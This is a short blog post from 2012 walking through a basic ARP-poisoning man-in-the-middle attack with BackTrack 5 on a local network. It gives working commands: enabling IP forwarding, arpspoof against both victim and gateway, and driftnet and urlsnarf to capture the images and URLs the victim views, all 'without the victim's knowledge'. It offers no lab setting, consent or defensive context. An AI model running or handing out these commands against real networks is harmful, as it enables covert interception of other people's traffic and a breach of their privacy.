martes, 4 de septiembre de 2012

BASIC MAN IN THE MIDDLE USING BACKTRACK 5

BASIC MAN IN THE MIDDLE USING BACKTRACK 5

Backtrack Linux Server (attacker) 192.168.1.137
Gateway: 192.168.1.1
Victim: 192.168.1.138


Summary of attack:
We will use an arp poisoning attack to redirect traffic from the victim’s PC to our Linux server. We then use another arp poisoning attack to make the gateway send information destined for the victim’s PC back to us.



We will then use driftnet to capture all images the victim’s PC from their web browser to our machine. Whatever image is on the victim’s PC will be displayed on our system.

We will also run urlsnarf to display every URL the victim PC browses to be displayed on our system. We will be able to see exactly what URLs the victim’s PC is accessing.

All this is done without the victim’s knowledge or accessing his PC.

We want our Linux server to act as a router, so it can intercept the traffic and pass it to the Internet. We want to have the traffic “flow thru” our Linux attack box.

1) To accomplish this we will modify the IP Tables and turn Linux into a router.
cat /proc/sys/net/ipv4/ip_forward

2) The default value is “0”. It should be set to 1. To change the value to 1, enter the following command:
sudo echo 1 >> /proc/sys/net/ipv4/ip_forward

3) Now go ahead and check out the ip_forward file and make sure the value equals “1”
cat /proc/sys/net/ipv4/ip_forward

4) An arp poisoning attack will redirect data from the victim’s PC going to their gateway to be redirected to our box (note you have to be on the same physical device, such as a switch or access point to accomplish this).
                                      sudo arpspoof –i eth1 –t 192.168.1.138 192.168.1.1

The “-i” command specifies which interface we are using on our attack box. The “-t” command specifies the target IP Address.

5) We will now use another arp poisoning attack to redirect data from the gateway destined for the victim’s PC back to our Linux box.
sudo arpspoof –i eth1 –t 192.168.1.1 192.168.1.138

6) Now we launch driftnet. It is listening.
sudo driftnet –i eth1

7) As the victim’s PC browsing the Internet, images that show up in his web browser are also displayed on the attacker’s Linux server.

8) The attacker PC launches urlsnarf. URLs that are accessed on the victim’s PC are displayed on the attacker’s Linux server.
sudo urlsnarf –i eth1








Publicado por en

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)